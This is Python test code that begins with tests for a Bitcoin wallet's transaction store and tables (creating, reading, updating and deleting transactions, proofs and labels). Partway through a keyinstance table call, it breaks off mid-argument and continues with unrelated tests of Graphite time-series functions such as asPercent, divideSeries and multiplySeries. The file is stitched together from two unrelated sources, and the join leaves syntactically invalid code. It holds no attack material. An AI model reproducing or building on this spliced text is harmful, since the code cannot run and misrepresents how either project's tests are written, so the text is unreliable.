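# and ORs in StateReceived, while the second (mask = Unset, i.e. 0) clears everything except
# the newly supplied StateReceived. (Semantics inferred from the observed results, not from
# the store implementation.)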
@pytest.mark.timeout(8)
def test_delete(self) -> None:
to_add = []
for i in range(10):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
to_add.append((tx_hash, metadata, bytedata, TxFlags.Unset, None))
with SynchronousWriter() as writer:
self.store.create(to_add, completion_callback=writer.get_callback())
assert writer.succeeded()
add_hashes = set(t[0] for t in to_add)
get_hashes = set(self._get_store_hashes())
assert add_hashes == get_hashes
with SynchronousWriter() as writer:
self.store.delete(add_hashes, completion_callback=writer.get_callback())
assert writer.succeeded()
get_hashes = self._get_store_hashes()
assert 0 == len(get_hashes)
@pytest.mark.timeout(8)
def test_get_all_pending(self):
get_tx_hashes = set([])
for tx_hex in (tx_hex_1, tx_hex_2):
bytedata = bytes.fromhex(tx_hex)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, TxFlags.Unset, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
get_tx_hashes.add(tx_hash)
result_tx_hashes = set(self._get_store_hashes())
assert get_tx_hashes == result_tx_hashes
@pytest.mark.timeout(8)
def test_get(self):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, TxFlags.Unset, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
assert tx_hash in self._get_store_hashes()
assert self.store.read(tx_hashes=[tx_hash])
assert self.store.read(TxFlags.HasByteData, TxFlags.HasByteData, [tx_hash])
@pytest.mark.timeout(8)
def test_read_metadata(self) -> None:
# We're going to add five matches and look for two of them, checking that we do not match
# unwanted rows.
all_tx_hashes = []
datas = []
for i in range(5):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=i*100, fee=i*1000, position=None, date_added=1, date_updated=1)
datas.append((tx_hash, metadata, bytedata, TxFlags.Unset, None))
all_tx_hashes.append(tx_hash)
with SynchronousWriter() as writer:
self.store.create(datas, completion_callback=writer.get_callback())
assert writer.succeeded()
# We also ask for a dud tx_hash that won't get matched.
select_tx_hashes = [ all_tx_hashes[0], all_tx_hashes[3], b"12121212" ]
rowdatas = self.store.read_metadata(tx_hashes=select_tx_hashes)
# Check that the two valid matches are there and their values match the projected values.
assert len(rowdatas) == 2
for rowdata in rowdatas:
tx_hash = rowdata[0]
tx_flags = rowdata[1]
metadata = rowdata[2]
rowidx = all_tx_hashes.index(tx_hash)
assert metadata.height == rowidx * 100
assert metadata.fee == rowidx * 1000
assert metadata.position is None
@pytest.mark.timeout(8)
def test_update_metadata(self) -> None:
# We're going to add five matches and look for two of them, checking that we do not match
# unwanted rows.
tx_hashes = []
datas = []
for i in range(5):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=i*100, fee=i*1000, position=None, date_added=1, date_updated=1)
datas.append((tx_hash, metadata, bytedata, TxFlags.Unset, None))
tx_hashes.append(tx_hash)
with SynchronousWriter() as writer:
self.store.create(datas, completion_callback=writer.get_callback())
assert writer.succeeded()
updates = []
for i in range(5):
tx_hash = tx_hashes[i]
metadata = TxData(height=i*200, fee=i*2000, position=None, date_added=1, date_updated=1)
updates.append((tx_hash, metadata, TxFlags.HasHeight | TxFlags.HasFee))
with SynchronousWriter() as writer:
self.store.update_metadata(updates, completion_callback=writer.get_callback())
assert writer.succeeded()
# We also ask for a dud tx_hash that won't get matched.
select_tx_hashes = [ tx_hashes[0], tx_hashes[3], b"12121212" ]
rowdatas = self.store.read_metadata(tx_hashes=select_tx_hashes)
# Check that the two valid matches are there and their values match the projected values.
assert len(rowdatas) == 2
for rowdata in rowdatas:
tx_hash = rowdata[0]
tx_flags = rowdata[1]
metadata = rowdata[2]
rowidx = tx_hashes.index(tx_hash)
assert metadata.height == rowidx * 200
assert metadata.fee == rowidx * 2000
assert metadata.position is None
@pytest.mark.timeout(8)
def test_read(self):
to_add = []
for i in range(10):
tx_bytes = os.urandom(10)
tx_hash = bitcoinx.double_sha256(tx_bytes)
tx_data = TxData(height=None, fee=2, position=None, date_added=1, date_updated=1)
to_add.append((tx_hash, tx_data, tx_bytes, TxFlags.HasFee, None))
with SynchronousWriter() as writer:
self.store.create(to_add, completion_callback=writer.get_callback())
assert writer.succeeded()
# Test the first "add" hash is matched.
matches = self.store.read(tx_hashes=[to_add[0][0]])
assert to_add[0][0] == matches[0][0]
# Test no id is matched.
matches = self.store.read(tx_hashes=[b"aaaa"])
assert 0 == len(matches)
# Test flag and mask combinations.
matches = self.store.read(flags=TxFlags.HasFee)
assert 10 == len(matches)
matches = self.store.read(flags=TxFlags.Unset, mask=TxFlags.HasHeight)
assert 10 == len(matches)
matches = self.store.read(flags=TxFlags.HasFee, mask=TxFlags.HasFee)
assert 10 == len(matches)
matches = self.store.read(flags=TxFlags.Unset, mask=TxFlags.HasFee)
assert 0 == len(matches)
@pytest.mark.timeout(8)
def test_proof(self):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, 0, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
position1 = 10
merkle_branch1 = [ os.urandom(32) for i in range(10) ]
proof = TxProof(position1, merkle_branch1)
date_updated = 1
with SynchronousWriter() as writer:
self.store.update_proof([ (tx_hash, proof, date_updated) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read_proof([ self.tx_hash ])
assert len(rows) == 0
db_tx_hash, (tx_position2, merkle_branch2) = self.store.read_proof([ tx_hash ])[0]
assert db_tx_hash == tx_hash
assert position1 == tx_position2
assert merkle_branch1 == merkle_branch2
@pytest.mark.timeout(8)
def test_labels(self):
bytedata_1 = os.urandom(10)
tx_hash_1 = bitcoinx.double_sha256(bytedata_1)
metadata_1 = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
bytedata_2 = os.urandom(10)
tx_hash_2 = bitcoinx.double_sha256(bytedata_2)
metadata_2 = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash_1, metadata_1, bytedata_1, 0, None),
(tx_hash_2, metadata_2, bytedata_2, 0, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
with SynchronousWriter() as writer:
self.store.update_descriptions([ ("tx 1", tx_hash_1) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read_descriptions()
assert len(rows) == 1
assert len([r[1] == "tx 1" for r in rows if r[0] == tx_hash_1]) == 1
with SynchronousWriter() as writer:
self.store.update_descriptions([ (None, tx_hash_1), ("tx 2", tx_hash_2) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read_descriptions([ tx_hash_2 ])
assert len(rows) == 1
assert rows[0][0] == tx_hash_2 and rows[0][1] == "tx 2"
# Reading entries for a non-existent ...
rows = self.store.read_descriptions([ self.tx_hash ])
assert len(rows) == 0
@pytest.mark.timeout(8)
def test_table_transactionoutputs_crud(db_context: DatabaseContext) -> None:
table = TransactionOutputTable(db_context)
assert [] == table.read()
table._get_current_timestamp = lambda: 10
TX_BYTES = os.urandom(10)
TX_HASH = bitcoinx.double_sha256(TX_BYTES)
TX_INDEX = 1
TXOUT_FLAGS = 1 << 15
KEYINSTANCE_ID = 1
ACCOUNT_ID = 10
MASTERKEY_ID = 20
DERIVATION_DATA1 = b'111'
DERIVATION_DATA2 = b'222'
SCRIPT_TYPE = 40
line1 = (TX_HASH, TX_INDEX, 100, KEYINSTANCE_ID, TXOUT_FLAGS)
line2 = (TX_HASH, TX_INDEX+1, 200, KEYINSTANCE_ID, TXOUT_FLAGS)
# No effect: the transaction foreign key constraint will fail as the referenced transaction
# does not exist.
with pytest.raises(sqlite3.IntegrityError):
with SynchronousWriter() as writer:
table.create([ line1 ], completion_callback=writer.get_callback())
assert not writer.succeeded()
# Satisfy the transaction foreign key constraint by creating the transaction.
transaction_table = TransactionTable(db_context)
with SynchronousWriter() as writer:
transaction_table.create([ (TX_HASH, TxData(height=1, fee=2, position=None, date_added=1,
date_updated=1), TX_BYTES, TxFlags.HasByteData|TxFlags.HasFee|TxFlags.HasHeight,
None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Satisfy the masterkey foreign key constraint by creating the masterkey.
masterkey_table = MasterKeyTable(db_context)
with SynchronousWriter() as writer:
masterkey_table.create([ (MASTERKEY_ID, None, 2, b'111') ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Satisfy the account foreign key constraint by creating the account.
account_table = AccountTable(db_context)
with SynchronousWriter() as writer:
account_table.create([ (ACCOUNT_ID, MASTERKEY_ID, ScriptType.P2PKH, 'name') ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Satisfy the keyinstance foreign key constraint by creating the keyinstance.
keyinstance_table = KeyInstanceTable(db_context)
with SynchronousWriter() as writer:
keyinstance_table.create([ (KEYINSTANCE_ID, ACCOUNT_ID, MASTERKEY_ID,
DerivationType.BIP32, DERIVATION_DATA1, SCRIPT_TYPE, True,
source = [
TimeSeries('collectd.test-db1.load.value',0,1,1,list(range(18)) + [None, None]),
]
delay = 2
expectedList = [
TimeSeries('delay(collectd.test-db1.load.value,2)',0,1,1,[None, None] + list(range(18))),
]
gotList = functions.delay({}, source, delay)
self.assertEqual(len(gotList), len(expectedList))
for got, expected in zip(gotList, expectedList):
self.assertListEqual(got, expected)
def test_asPercent_error(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
with self.assertRaisesRegexp(ValueError, "asPercent second argument must be missing, a single digit, reference exactly 1 series or reference the same number of series as the first argument"):
functions.asPercent({}, seriesList, seriesList2)
def test_asPercent_no_seriesList2(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList:
series.pathExpression = series.name
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, 50.0, 33.33, 100.0, 20.0, 33.33, 25.0, 25.0, 20.0, 25.0, 25.0, 25.0, 25.0, 33.33, 25.0, 33.33, 25.0, 50.0, 33.33]),
TimeSeries('asPercent(collectd.test-db2.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[None, 20.0, None, 33.33, None, 20.0, None, 25.0, None, 20.0, None, 25.0, None, 25.0, None, 25.0, None, 25.0, None, 33.33]),
TimeSeries('asPercent(collectd.test-db3.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, None, None, None, 20.0, 33.33, 25.0, 25.0, 20.0, 25.0, 25.0, 25.0, 25.0, 33.33, 25.0, 33.33, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, 50.0, 33.33, None, 20.0, None, None, 25.0, 20.0, 25.0, None, 25.0, None, None, None, None, 25.0, 50.0, 33.33]),
TimeSeries('asPercent(collectd.test-db5.load.value,sumSeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value))',0,1,1,[25.0, 20.0, None, None, None, 20.0, 33.33, 25.0, 25.0, 20.0, 25.0, 25.0, 25.0, 25.0, 33.33, 25.0, 33.33, 25.0, None, None]),
]
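# Sanity check of the expected values: at t=0 the per-timestamp total over the five inputs
# is 1 + 1 + 1 + 1 = 4 (the None in test-db2 is skipped by the sum), so each non-None value
# of 1 becomes 1/4 = 25.0, while test-db2 itself stays None at that point.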
result = functions.asPercent({}, seriesList)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_asPercent_integer(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,10)',0,1,1,[10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0, 160.0, 170.0, 180.0, 190.0, 200.0]),
TimeSeries('asPercent(collectd.test-db2.load.value,10)',0,1,1,[None, 20.0, None, 40.0, None, 60.0, None, 80.0, None, 100.0, None, 120.0, None, 140.0, None, 160.0, None, 180.0, None, 200.0]),
TimeSeries('asPercent(collectd.test-db3.load.value,10)',0,1,1,[10.0, 20.0, None, None, None, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0, 160.0, 170.0, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,10)',0,1,1,[10.0, 20.0, 30.0, 40.0, None, 60.0, None, None, 90.0, 100.0, 110.0, None, 130.0, None, None, None, None, 180.0, 190.0, 200.0]),
TimeSeries('asPercent(collectd.test-db5.load.value,10)',0,1,1,[10.0, 20.0, None, None, None, 60.0, 70.0, 80.0, 90.0, 100.0, 110.0, 120.0, 130.0, 140.0, 150.0, 160.0, 170.0, 180.0, None, None])
]
result = functions.asPercent({}, seriesList, 10)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_asPercent_seriesList2_single(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db2.load.value,collectd.test-db1.load.value)',0,1,1,[None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0]),
TimeSeries('asPercent(collectd.test-db3.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, None, 100.0, None, None, 100.0, 100.0, 100.0, None, 100.0, None, None, None, None, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db5.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None])
]
result = functions.asPercent({}, seriesList, seriesList2)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_asPercent_seriesList2_multi(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
expectedResult = [
TimeSeries('asPercent(collectd.test-db1.load.value,collectd.test-db1.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db2.load.value,collectd.test-db2.load.value)',0,1,1,[None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0, None, 100.0]),
TimeSeries('asPercent(collectd.test-db3.load.value,collectd.test-db3.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None, None]),
TimeSeries('asPercent(collectd.test-db4.load.value,collectd.test-db4.load.value)',0,1,1,[100.0, 100.0, 100.0, 100.0, None, 100.0, None, None, 100.0, 100.0, 100.0, None, 100.0, None, None, None, None, 100.0, 100.0, 100.0]),
TimeSeries('asPercent(collectd.test-db5.load.value,collectd.test-db5.load.value)',0,1,1,[100.0, 100.0, None, None, None, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, None, None])
]
result = functions.asPercent({}, seriesList, seriesList2)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_divideSeries_error(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
with self.assertRaisesRegexp(ValueError, "divideSeries second argument must reference exactly 1 series \(got 2\)"):
functions.divideSeries({}, seriesList, seriesList2)
def test_divideSeries_seriesList2_single(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
expectedResult = [
TimeSeries('divideSeries(collectd.test-db1.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
TimeSeries('divideSeries(collectd.test-db2.load.value,collectd.test-db1.load.value)',0,1,1,[None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0, None, 1.0]),
TimeSeries('divideSeries(collectd.test-db3.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, None, None, None, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, None, None, None]),
TimeSeries('divideSeries(collectd.test-db4.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, 1.0, 1.0, None, 1.0, None, None, 1.0, 1.0, 1.0, None, 1.0, None, None, None, None, 1.0, 1.0, 1.0]),
TimeSeries('divideSeries(collectd.test-db5.load.value,collectd.test-db1.load.value)',0,1,1,[1.0, 1.0, None, None, None, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, None, None])
]
result = functions.divideSeries({}, seriesList, seriesList2)
for i, series in enumerate(result):
for k, v in enumerate(series):
if type(v) is float:
series[k] = round(v,2)
self.assertEqual(result, expectedResult)
def test_multiplySeries_single(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
self.assertEqual(functions.multiplySeries({}, seriesList), seriesList)
def test_multiplySeries(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
expectedResult = [
TimeSeries('multiplySeries(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value)',0,1,1,[None, 32.0, None, None, None, 7776.0, None, None, None, 100000.0, None, None, None, None, None, None, None, None, None, None]),
]
result = functions.multiplySeries({}, seriesList)
self.assertEqual(result, expectedResult)
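# Worked example: at t=1 every input is 2, so the product is 2**5 = 32.0; at t=0 test-db2 is
# None and a single None factor makes the whole product None, matching expectedResult.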
def _verify_series_consolidationFunc(self, seriesList, value):
"""
Verify the consolidationFunc is set to the specified value
"""
for series in seriesList:
self.assertEqual(series.consolidationFunc, value)
def test_cumulative(self):
seriesList = self._generate_series_list()
self._verify_series_consolidationFunc(seriesList, "average")
results = functions.cumulative({}, seriesList)
self._verify_series_consolidationFunc(results, "sum")
def test_consolidateBy(self):
seriesList = self._generate_series_list()
self._verify_series_consolidationFunc(seriesList, "average")
avail_funcs = ['sum', 'average', 'min', 'max']
for func in avail_funcs:
results = functions.consolidateBy({}, seriesList, func)
self._verify_series_consolidationFunc(results, func)
def test_weightedAverage(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList:
series.pathExpression = series.name
seriesList2 = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
TimeSeries('collectd.test-db4.load.value',0,1,1,[1,2,3,4,None,6,None,None,9,10,11,None,13,None,None,None,None,18,19,20]),
TimeSeries('collectd.test-db5.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,18,None,None]),
]
for series in seriesList2:
series.pathExpression = series.name
expectedResult = [
TimeSeries('weightedAverage(collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value, collectd.test-db1.load.value,collectd.test-db2.load.value,collectd.test-db3.load.value,collectd.test-db4.load.value,collectd.test-db5.load.value, 1)',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
]
result = functions.weightedAverage({}, seriesList, seriesList2, 1)
self.assertEqual(result, expectedResult)
def test_weightedAverage_mismatched_series(self):
seriesList = [
TimeSeries('collectd.test-db1.load.value',0,1,1,[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]),
TimeSeries('collectd.test-db2.load.value',0,1,1,[None,2,None,4,None,6,None,8,None,10,None,12,None,14,None,16,None,18,None,20]),
TimeSeries('collectd.test-db3.load.value',0,1,1,[1,2,None,None,None,6,7,8,9,10,11,12,13,14,15,16,17,None,None,None]),
